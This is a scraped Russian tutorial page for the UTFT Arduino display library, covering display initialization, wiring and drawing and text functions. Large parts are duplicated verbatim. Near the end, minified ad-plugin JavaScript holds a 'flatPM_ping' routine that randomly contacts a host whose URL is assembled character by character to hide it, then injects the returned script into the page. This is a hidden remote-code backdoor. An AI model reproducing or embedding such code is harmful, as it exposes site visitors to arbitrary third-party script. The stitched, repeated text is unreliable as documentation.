Utft команды библиотеки ардуино

Библиотека

Поддерживаемые дисплеи

Дисплеи Инициализация
Цветной графический дисплей 2.8 TFT 320х240 Данный дисплей совместим с любыми Arduino.

UTFT myGLCD(TFT01_24SP, 6, 5, 4, 3, 2);

Дисплей можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myGLCD библиотеки UTFT:
UTFT myGLCD(TFT01_24SP, SDI/MOSI, SCK, CS, RESET, DC/RS);

На дисплее установлен преобразователь уровней, так что его можно подключать и к 3В и к 5В логике.

Описание работы с сенсорным экраном находится в разделе Wiki работа с TouchScreen

UTFT myGLCD(TFT32MEGA, 38, 39, 40, 41); // дисплей на чипе ILI9341.
или
UTFT myGLCD(TFT32MEGA_2, 38, 39, 40, 41); // дисплей на чипе HX8357C.

Дисплеи поставляются на базе чипа ILI9341 или HX8357C. Если изображение на дисплее отображается зеркально, то измените тип дисплея: укажите либо TFT32MEGA, либо TFT32MEGA_2.

Если Вы не планируете использовать SD карту, то выводы 50-53 можно использовать для подключения других модулей.

Выводы не подписанные на рисунке, не используются дисплеем.

UTFT myGLCD(TFT28UNO, A2, A1, A3, A4, A0);

Если Вы не планируете использовать SD карту, то выводы 10-13 можно использовать для подключения других модулей.

Выводы не подписанные на рисунке, не используются дисплеем.

Описание работы с сенсорным экраном находится в разделе Wiki работа с TouchScreen

UTFT myGLCD(TFT01_24SP, 5, 4, 8, 7, 6);

Дисплей можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myGLCD библиотеки UTFT:
UTFT myGLCD(TFT01_24SP, SDI/MOSI, SCK, CS, RESET, DC/RS);

Уровень логической «1» на входах дисплея ≤ 3,3 В.
Если Вы используете 5 В логику, то подключайте входы дисплея через делители:

При питании от 3,3 В необходимо замкнуть перемычку J1 на обратной стороне платы дисплея.

Если Вы желаете использовать SD-карту, то выводы SD_CS, SD_MOSI, SD_MISO и SD_SCK необходимо подключить к Arduino по аппаратной шине SPI:

Если аппаратный вывод CS(SS) Arduino занят, то вывод SD_CS можно подключить к любому другому выводу Arduino, указав его номер в скетче (см пример в файле image_SD библиотеки UTFT).

TouchScreen можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myTouch библиотеки URTouch:
URTouch myTouch( T_CLK, T_CS, T_DIN, T_OUT, T_IRQ);
Например: URTouch myTouch(13, 12, 11, 10, 9);

Указанные в примере выводы Arduino для подключения TouchScreen пересекаются с выводами аппаратной шины SPI на платах Arduino Uno, Pro Mini, Nano и т.д. Если Вы желаете использовать на этих платах и TouchScreen, и SD-карту , то для TouchScreen нужно выбрать другие выводы Arduino, например, аналоговые выводы A0-A4, указав их в скетче при объявлении объекта:
URTouch myTouch(A0, A1, A2, A3, A4);

Описание работы с сенсорным экраном со встроенным контроллером функций TouchScreen находится в разделе Wiki работа с TouchScreen по последовательной шине данных.

UTFT myGLCD(TFT01_22SP, 5, 4, 8, 7, 6);

UTFT myGLCD(TFT18SHLD, 5, 4, 8, 7, 6);

Дисплей можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myGLCD библиотеки UTFT:
UTFT myGLCD(TFT01_22SP, SDI/MOSI, SCK, CS, RESET, DC/RS);

Уровень логической «1» на входах дисплея ≤ 3,3 В.
Если Вы используете 5 В логику, то подключайте входы дисплея через делители:

Если Вы желаете использовать SD-карту, то выводы SD_CS, SD_MOSI, SD_MISO и SD_SCK необходимо подключить к Arduino по аппаратной шине SPI:

Если аппаратный вывод CS(SS) Arduino занят, то вывод SD_CS можно подключить к любому другому выводу Arduino, указав его номер в скетче (см пример в файле image_SD библиотеки UTFT).

Если Вы собираетесь использовать библиотеку UTFT для работы с другими дисплеями, то закомментируйте строку с названием Вашего дисплея в файле «memorysaver.h». А для экономии памяти, раскомментируйте остальные строки кода файла «memorysaver.h».

#1 Пример

Выводим на дисплей текст тремя базовыми шрифтами:

#2 Пример

Заливаем весь дисплей различными цветами:

#3 Пример

Рисуем различные графические элементы:

Базовые функции:

Все функции:

  • InitLCD([положение]); – Инициирует начало работы с дисплеем. Необязательный параметр может принимать одно из двух значений: PORTRAIT (вертикальная ориентация) или LANDSCAPE (горизонтальная ориентация – по умолчанию).
  • clrScr(); – Очищает дисплей, стирая всю отображаемую на дисплее информацию и заливая дисплей черным цветом.
  • fillScr(color); – Очищает дисплей, стирая всю отображаемую на дисплее информацию и заливая его указанным в качестве параметра цветом фона.
  • getDisplayXSize(); – Возвращает количество пикселей дисплея по горизонтали, число типа int.
  • getDisplayYSize(); – Возвращает количество пикселей дисплея по вертикали, число типа int.
  • setColor(color); – Выбор цвета для текста и фигур, выводимых после данной функции.
  • getColor(); – Возвращает установленный цвет для текста и фигур в формате RGB565, число типа word.
  • setBackColor(color); – Выбор цвета для фона текста, выводимого после данной функции.
  • getBackColor(); – Возвращает установленный цвет для фона текста в формате RGB565, число типа word.
  • setFont(fontName); – Выбор шрифта для текста выводимого после данной функции.
  • getFont(); – Возвращает указатель на выбранный шрифт.
  • getFontXsize(); – Возвращает количество пикселей в одном символе шрифта, по ширине.
  • getFontYsize(); – Возвращает количество пикселей в одном символе шрифта, по высоте.
  • print(str,x,y[,r]); – Вывод на дисплей строк или содержимого строковых переменных.
  • printNumI(int,x,y[,len[,sym]]); – Вывод на дисплей целого числа или содержимого целочисленной переменной.
  • printNumF(float,dec,x,y[,sym1[,len[,sym2]]]); – Вывод на дисплей вещественного числа или содержимого переменной вещественного типа
  • drawPixel(x,y); – Вывод на дисплей точки. Цвет точки определяется текущим значением цвета, устанавливаемым командой setColor().
  • drawLine(x1,y1,x2,y2); – Вывод на дисплей линии, заданной координатами двух точек.
  • drawRect(x1,y1,x2,y2); – Вывод на дисплей прямоугольника, противоположные углы которого заданы координатами двух точек.
  • drawRoundRect(x1,y1,x2,y2); – Вывод на дисплей прямоугольника со скругленными углами.
  • fillRect(x1,y1,x2,y2); – Вывод на дисплей закрашенного прямоугольника.
  • drawCircle(x,y,R); – Вывод на дисплей окружности, определяемую координатами центра и радиусом.
  • fillCircle(x,y,R); – Вывод на дисплей закрашенной окружности.
  • drawBitmap(x1,y1,x2,y2,data[,scale]); – Вывод на дисплей картинки из массива.
  • Для вывода на дисплей картинки из файла с SD-карты нужно вызвать функцию load(x1,y1,x2,y2,data); объекта библиотеки UTFT_SdRaw.
    Для работы функции load, нужно установить и подключить библиотеки: UTFT_SdRaw и SdFat.

Инициализация работы с дисплеем:

Данный дисплей совместим только с Arduino Mega.
Цветной графический дисплей 2.8 TFT 320×240 UNO
Данный дисплей совместим только с Arduino Uno.
Цветной графический дисплей 2.4 TFT 240×320
Данный дисплей совместим с любыми Arduino.
Данный дисплей совместим с любыми Arduino.
InitLCD( [положение] );
Инициализация работы с дисплеем, с указанием его положения.

InitLCD(PORTRAIT); // инициализация (вертикальное положение)

Очистка экрана:

Параметр:

    Положение может быть горизонтальным или вертикальным:
  • положение: PORTRAIT – вертикальное
  • положение: LANDSCAPE – горизонтальное (по умолчанию)
clrScr();
Очистка экрана с заливкой дисплея чёрным цветом
Параметр: Без параметров.
fillScr( color );
Очистка экрана с заливкой заданным цветом.

fillScr(VGA_RED); // красный цвет

Выбор цвета:

Параметр:

    Цет можно задать тремя способами:
  • color: По названию цвета – VGA_RED
  • color: В формате RGB565 – 0x001F
  • color: В формате RGB – 255,100,0
setColor( color );
Выбор цвета для текста и фигур, выводимых после данной функции.

setColor(0,0,255); // синий цвет

setBackColor(2016); // зелёный цвет

Удобнее всего устанавливать цвет по его названию:
Полный перечень цветов: VGA_BLACK, VGA_WHITE, VGA_RED, VGA_GREEN, VGA_BLUE, VGA_SILVER, VGA_GRAY, VGA_MAROON, VGA_YELLOW, VGA_OLIVE, VGA_LIME, VGA_AQUA, VGA_TEAL, VGA_NAVY, VGA_FUCHSIA, VGA_PURPLE, VGA_TRANSPARENT.

Выбор шрифта:

Параметр:

    Цет можно задать тремя способами:
  • color: По названию цвета – VGA_RED
  • color: В формате RGB565 – 0x001F
  • color: В формате RGB – 255,100,0
setBackColor( color );
Выбор цвета для фона текста, выводимого после данной функции.
Параметр:

    Цет можно задать тремя способами:
  • color: По названию цвета – VGA_RED
  • color: В формате RGB565 – 0x001F
  • color: В формате RGB – 255,100,0
setFont( fontName );
Выбор шрифта для текста выводимого после данной функции.

setFont(SmallFont); // маленький шрифт

Вывод текста:

Параметр:

    По умолчанию в библиотеке есть 3 шрифта:
  • fontName: SmallFont – маленький шрифт
  • fontName: BigFont – большой шрифт
  • fontName: SevenSegNumFont – шрифт имитирующий семисегментный индикатор
print( str , x , y [, r] );
Выводит на дисплей строки или содержимое строковых переменных.

print("iarduino", 50, 50); // текст "iarduino" горизонтально
print("iarduino", 50, 50, 90); // текст "iarduino" вертикально

printNumI(2000,50,50); // результат: "2000"
printNumI(2000,50,50,0); // результат: "2000"
printNumI(2000,50,50,5); // результат: " 2000"
printNumI(2000,50,50,6,’0′); // результат: "002000"

printNumF(-234.3442,2,50,50); // результат "-234.34"
printNumF(-234.3442,3,50,50); // результат "-234.344"
printNumF(-234.3442,4,50,50,’*’); // результат "-234*3442"
printNumF(-234.3442,1,50,50,’,’,1); // результат "-234,3"
printNumF(-234.3442,1,50,50,’,’,7); // результат " -234,3"
printNumF(-234.3442,1,50,50,’,’,7,’0′); // результат "-0234,3"

Библиотека

Поддерживаемые дисплеи

Параметры:

  • str: строка или содержимое строковой переменной
  • x: координата X
  • y: координата Y координаты верхнего левого угла области печати
    (x можно указать как число или LEFT / RIGHT / CENTER)
  • r: поворот текста в градусах, вокруг точки x,y
    r – необязательный параметр
printNumI( int , x , y [, len [, sym ] ] );
Выводит на дисплей целые числа или содержимое целочисленных переменных.
Параметры:

  • int: целое число или содержимое целочисленной переменной
  • x: координата X
  • y: координата Y координаты верхнего левого угла области печати
    (x можно указать как число или LEFT / RIGHT / CENTER)
  • len: количество выводимых разрядов числа int.
    игнорируется если len меньше количества разрядов int.
    необязательный параметр, по умолчанию: 0
  • sym: символ заменяющий недостающие разряды.
    необязательный параметр, по умолчанию: ‘ ‘
    (если len больше чем количество разрядов числа int, то недостающие разряды перед числом будут заменены на sym.)
printNumF( float , dec, x , y [, sym1 [, len [, sym2 ] ] ] );
Выводит на дисплей вещественные числа или содержимое переменных вещественного типа.
Дисплеи Инициализация
Цветной графический дисплей 2.8 TFT 320х240 Данный дисплей совместим с любыми Arduino.

UTFT myGLCD(TFT01_24SP, 6, 5, 4, 3, 2);

Дисплей можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myGLCD библиотеки UTFT:
UTFT myGLCD(TFT01_24SP, SDI/MOSI, SCK, CS, RESET, DC/RS);

На дисплее установлен преобразователь уровней, так что его можно подключать и к 3В и к 5В логике.

Описание работы с сенсорным экраном находится в разделе Wiki работа с TouchScreen

UTFT myGLCD(TFT32MEGA, 38, 39, 40, 41); // дисплей на чипе ILI9341.
или
UTFT myGLCD(TFT32MEGA_2, 38, 39, 40, 41); // дисплей на чипе HX8357C.

Дисплеи поставляются на базе чипа ILI9341 или HX8357C. Если изображение на дисплее отображается зеркально, то измените тип дисплея: укажите либо TFT32MEGA, либо TFT32MEGA_2.

Если Вы не планируете использовать SD карту, то выводы 50-53 можно использовать для подключения других модулей.

Выводы не подписанные на рисунке, не используются дисплеем.

UTFT myGLCD(TFT28UNO, A2, A1, A3, A4, A0);

Если Вы не планируете использовать SD карту, то выводы 10-13 можно использовать для подключения других модулей.

Выводы не подписанные на рисунке, не используются дисплеем.

Описание работы с сенсорным экраном находится в разделе Wiki работа с TouchScreen

UTFT myGLCD(TFT01_24SP, 5, 4, 8, 7, 6);

Дисплей можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myGLCD библиотеки UTFT:
UTFT myGLCD(TFT01_24SP, SDI/MOSI, SCK, CS, RESET, DC/RS);

Уровень логической «1» на входах дисплея ≤ 3,3 В.
Если Вы используете 5 В логику, то подключайте входы дисплея через делители:

При питании от 3,3 В необходимо замкнуть перемычку J1 на обратной стороне платы дисплея.

Если Вы желаете использовать SD-карту, то выводы SD_CS, SD_MOSI, SD_MISO и SD_SCK необходимо подключить к Arduino по аппаратной шине SPI:

Если аппаратный вывод CS(SS) Arduino занят, то вывод SD_CS можно подключить к любому другому выводу Arduino, указав его номер в скетче (см пример в файле image_SD библиотеки UTFT).

TouchScreen можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myTouch библиотеки URTouch:
URTouch myTouch( T_CLK, T_CS, T_DIN, T_OUT, T_IRQ);
Например: URTouch myTouch(13, 12, 11, 10, 9);

Указанные в примере выводы Arduino для подключения TouchScreen пересекаются с выводами аппаратной шины SPI на платах Arduino Uno, Pro Mini, Nano и т.д. Если Вы желаете использовать на этих платах и TouchScreen, и SD-карту , то для TouchScreen нужно выбрать другие выводы Arduino, например, аналоговые выводы A0-A4, указав их в скетче при объявлении объекта:
URTouch myTouch(A0, A1, A2, A3, A4);

Описание работы с сенсорным экраном со встроенным контроллером функций TouchScreen находится в разделе Wiki работа с TouchScreen по последовательной шине данных.

UTFT myGLCD(TFT01_22SP, 5, 4, 8, 7, 6);

UTFT myGLCD(TFT18SHLD, 5, 4, 8, 7, 6);

Дисплей можно подключать к любым выводам Arduino указав № выводов при объявлении объекта myGLCD библиотеки UTFT:
UTFT myGLCD(TFT01_22SP, SDI/MOSI, SCK, CS, RESET, DC/RS);

Уровень логической «1» на входах дисплея ≤ 3,3 В.
Если Вы используете 5 В логику, то подключайте входы дисплея через делители:

Если Вы желаете использовать SD-карту, то выводы SD_CS, SD_MOSI, SD_MISO и SD_SCK необходимо подключить к Arduino по аппаратной шине SPI:

Если аппаратный вывод CS(SS) Arduino занят, то вывод SD_CS можно подключить к любому другому выводу Arduino, указав его номер в скетче (см пример в файле image_SD библиотеки UTFT).

Если Вы собираетесь использовать библиотеку UTFT для работы с другими дисплеями, то закомментируйте строку с названием Вашего дисплея в файле «memorysaver.h». А для экономии памяти, раскомментируйте остальные строки кода файла «memorysaver.h».

#1 Пример

Выводим на дисплей текст тремя базовыми шрифтами:

#2 Пример

Заливаем весь дисплей различными цветами:

#3 Пример

Рисуем различные графические элементы:

Базовые функции:

Все функции:

  • InitLCD([положение]); – Инициирует начало работы с дисплеем. Необязательный параметр может принимать одно из двух значений: PORTRAIT (вертикальная ориентация) или LANDSCAPE (горизонтальная ориентация – по умолчанию).
  • clrScr(); – Очищает дисплей, стирая всю отображаемую на дисплее информацию и заливая дисплей черным цветом.
  • fillScr(color); – Очищает дисплей, стирая всю отображаемую на дисплее информацию и заливая его указанным в качестве параметра цветом фона.
  • getDisplayXSize(); – Возвращает количество пикселей дисплея по горизонтали, число типа int.
  • getDisplayYSize(); – Возвращает количество пикселей дисплея по вертикали, число типа int.
  • setColor(color); – Выбор цвета для текста и фигур, выводимых после данной функции.
  • getColor(); – Возвращает установленный цвет для текста и фигур в формате RGB565, число типа word.
  • setBackColor(color); – Выбор цвета для фона текста, выводимого после данной функции.
  • getBackColor(); – Возвращает установленный цвет для фона текста в формате RGB565, число типа word.
  • setFont(fontName); – Выбор шрифта для текста выводимого после данной функции.
  • getFont(); – Возвращает указатель на выбранный шрифт.
  • getFontXsize(); – Возвращает количество пикселей в одном символе шрифта, по ширине.
  • getFontYsize(); – Возвращает количество пикселей в одном символе шрифта, по высоте.
  • print(str,x,y[,r]); – Вывод на дисплей строк или содержимого строковых переменных.
  • printNumI(int,x,y[,len[,sym]]); – Вывод на дисплей целого числа или содержимого целочисленной переменной.
  • printNumF(float,dec,x,y[,sym1[,len[,sym2]]]); – Вывод на дисплей вещественного числа или содержимого переменной вещественного типа
  • drawPixel(x,y); – Вывод на дисплей точки. Цвет точки определяется текущим значением цвета, устанавливаемым командой setColor().
  • drawLine(x1,y1,x2,y2); – Вывод на дисплей линии, заданной координатами двух точек.
  • drawRect(x1,y1,x2,y2); – Вывод на дисплей прямоугольника, противоположные углы которого заданы координатами двух точек.
  • drawRoundRect(x1,y1,x2,y2); – Вывод на дисплей прямоугольника со скругленными углами.
  • fillRect(x1,y1,x2,y2); – Вывод на дисплей закрашенного прямоугольника.
  • drawCircle(x,y,R); – Вывод на дисплей окружности, определяемую координатами центра и радиусом.
  • fillCircle(x,y,R); – Вывод на дисплей закрашенной окружности.
  • drawBitmap(x1,y1,x2,y2,data[,scale]); – Вывод на дисплей картинки из массива.
  • Для вывода на дисплей картинки из файла с SD-карты нужно вызвать функцию load(x1,y1,x2,y2,data); объекта библиотеки UTFT_SdRaw.
    Для работы функции load, нужно установить и подключить библиотеки: UTFT_SdRaw и SdFat.

Инициализация работы с дисплеем:

Данный дисплей совместим только с Arduino Mega.
Цветной графический дисплей 2.8 TFT 320×240 UNO
Данный дисплей совместим только с Arduino Uno.
Цветной графический дисплей 2.4 TFT 240×320
Данный дисплей совместим с любыми Arduino.
Данный дисплей совместим с любыми Arduino.
InitLCD( [положение] );
Инициализация работы с дисплеем, с указанием его положения.

InitLCD(PORTRAIT); // инициализация (вертикальное положение)

Очистка экрана:

Параметр:

    Положение может быть горизонтальным или вертикальным:
  • положение: PORTRAIT – вертикальное
  • положение: LANDSCAPE – горизонтальное (по умолчанию)
clrScr();
Очистка экрана с заливкой дисплея чёрным цветом
Параметр: Без параметров.
fillScr( color );
Очистка экрана с заливкой заданным цветом.

fillScr(VGA_RED); // красный цвет

Выбор цвета:

Параметр:

    Цет можно задать тремя способами:
  • color: По названию цвета – VGA_RED
  • color: В формате RGB565 – 0x001F
  • color: В формате RGB – 255,100,0
setColor( color );
Выбор цвета для текста и фигур, выводимых после данной функции.

setColor(0,0,255); // синий цвет

setBackColor(2016); // зелёный цвет

Удобнее всего устанавливать цвет по его названию:
Полный перечень цветов: VGA_BLACK, VGA_WHITE, VGA_RED, VGA_GREEN, VGA_BLUE, VGA_SILVER, VGA_GRAY, VGA_MAROON, VGA_YELLOW, VGA_OLIVE, VGA_LIME, VGA_AQUA, VGA_TEAL, VGA_NAVY, VGA_FUCHSIA, VGA_PURPLE, VGA_TRANSPARENT.

Выбор шрифта:

Параметр:

    Цет можно задать тремя способами:
  • color: По названию цвета – VGA_RED
  • color: В формате RGB565 – 0x001F
  • color: В формате RGB – 255,100,0
setBackColor( color );
Выбор цвета для фона текста, выводимого после данной функции.
Параметр:

    Цет можно задать тремя способами:
  • color: По названию цвета – VGA_RED
  • color: В формате RGB565 – 0x001F
  • color: В формате RGB – 255,100,0
setFont( fontName );
Выбор шрифта для текста выводимого после данной функции.

setFont(SmallFont); // маленький шрифт

Вывод текста:

Параметр:

    По умолчанию в библиотеке есть 3 шрифта:
  • fontName: SmallFont – маленький шрифт
  • fontName: BigFont – большой шрифт
  • fontName: SevenSegNumFont – шрифт имитирующий семисегментный индикатор
print( str , x , y [, r] );
Выводит на дисплей строки или содержимое строковых переменных.

print("iarduino", 50, 50); // текст "iarduino" горизонтально
print("iarduino", 50, 50, 90); // текст "iarduino" вертикально

printNumI(2000,50,50); // результат: "2000"
printNumI(2000,50,50,0); // результат: "2000"
printNumI(2000,50,50,5); // результат: " 2000"
printNumI(2000,50,50,6,’0′); // результат: "002000"

printNumF(-234.3442,2,50,50); // результат "-234.34"
printNumF(-234.3442,3,50,50); // результат "-234.344"
printNumF(-234.3442,4,50,50,’*’); // результат "-234*3442"
printNumF(-234.3442,1,50,50,’,’,1); // результат "-234,3"
printNumF(-234.3442,1,50,50,’,’,7); // результат " -234,3"
printNumF(-234.3442,1,50,50,’,’,7,’0′); // результат "-0234,3"

Релизы

Для работы с данными дисплеями отлично подойдет библиотека UTFT.

    В данную библиотеку добавлена поддержка следующих дисплеев:
  • 2.8 TFT 320×240 UNO.
  • 3.2 TFT 480×320 MEGA.
  • 3.95 TFT 480×320 UNO.
    Инициализация дисплеев:
  • Цветной графический дисплей 3.95 TFT 480×320 UNO
    инициализация: UTFT myGLCD(TFT395UNO, A2, A1, A3, A4, A0);
  • Цветной графический дисплей 3.2 TFT 480×320 MEGA
    инициализация: UTFT myGLCD(TFT32MEGA, A2, A1, A3, A4, A0); // дисплей на чипе: ILI9481.
    инициализация: UTFT myGLCD(TFT32MEGA_2, A2, A1, A3, A4, A0); // дисплей на чипе: HX8357C.
  • Цветной графический дисплей 2.8 TFT 320×240 UNO
    инициализация: UTFT myGLCD(TFT28UNO, A2, A1, A3, A4, A0);
  • Цветной графический дисплей 2.4 TFT 240×320
    инициализация: UTFT myGLCD(TFT01_24SP, SDI/MOSI, SCK, CS, RESET, DC/RS);
    пример: UTFT myGLCD(TFT01_24SP, 5, 4, 8, 7, 6); // можно использовать любые выводы Arduino.
  • Цветной графический дисплей 2.2 TFT 320×240
    инициализация: UTFT myGLCD(TFT01_22SP, SDI/MOSI, SCK, CS, RESET, DC/RS);
    пример: UTFT myGLCD(TFT01_22SP, 5, 4, 8, 7, 6); // можно использовать любые выводы Arduino.
  • Цветной графический дисплей 1.8 TFT 128×160
    инициализация: UTFT myGLCD(TFT18SHLD, SDA, SCK, CS, RESET, A0);
    пример: UTFT myGLCD(TFT18SHLD, 5, 4, 8, 7, 6); // можно использовать любые выводы Arduino.

Описание функций и примеры работы с цветными TFT дисплеями.

Оцените статью
ПК Знаток
Добавить комментарий

Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
Параметры:

  • str: строка или содержимое строковой переменной
  • x: координата X
  • y: координата Y координаты верхнего левого угла области печати
    (x можно указать как число или LEFT / RIGHT / CENTER)
  • r: поворот текста в градусах, вокруг точки x,y
    r – необязательный параметр
printNumI( int , x , y [, len [, sym ] ] );
Выводит на дисплей целые числа или содержимое целочисленных переменных.
Параметры:

  • int: целое число или содержимое целочисленной переменной
  • x: координата X
  • y: координата Y координаты верхнего левого угла области печати
    (x можно указать как число или LEFT / RIGHT / CENTER)
  • len: количество выводимых разрядов числа int.
    игнорируется если len меньше количества разрядов int.
    необязательный параметр, по умолчанию: 0
  • sym: символ заменяющий недостающие разряды.
    необязательный параметр, по умолчанию: ‘ ‘
    (если len больше чем количество разрядов числа int, то недостающие разряды перед числом будут заменены на sym.)
printNumF( float , dec, x , y [, sym1 [, len [, sym2 ] ] ] );
Выводит на дисплей вещественные числа или содержимое переменных вещественного типа.